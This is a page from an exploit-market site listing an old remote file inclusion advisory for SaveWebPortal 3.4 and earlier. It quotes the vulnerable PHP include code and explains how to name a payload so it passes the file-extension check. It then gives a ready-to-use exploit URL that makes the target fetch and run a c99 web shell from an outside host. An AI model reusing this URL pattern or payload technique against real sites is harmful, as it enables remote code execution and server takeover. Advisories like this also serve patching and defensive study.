[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability

Author
Bl0od3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-678
Category
web applications
Date add
09-08-2006
Platform
unsorted
===============================================================
SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability
===============================================================



--------------------------------------------
SaveWebPortal <= 3.4(page) Remote File Inclusion Vulnerability
Download:http://www.circeos.it/frontend/theme4/index.php?page=downloads
--------------------------------------------
Found by x0rax
--------------------------------------------
Vulnerable Code:
<?php
....
if (strstr ($page, ".php") ||
                       strstr ($page, ".htm") ||
                       strstr ($page, ".html")) {
                       include ("$page");
....
?>
--------------------------------------------
to inject succesfully you have to create a file called shell.html.txt or
shell.php.txt
otherwise it wont work!
--------------------------------------------
Affected File:
index.php =]
--------------------------------------------
Vulnerability:
http://host.com/index.php?page=http://master-boy.cwsurf.de/c99.php.txt
--------------------------------------------



#  0day.today [2024-11-16]  #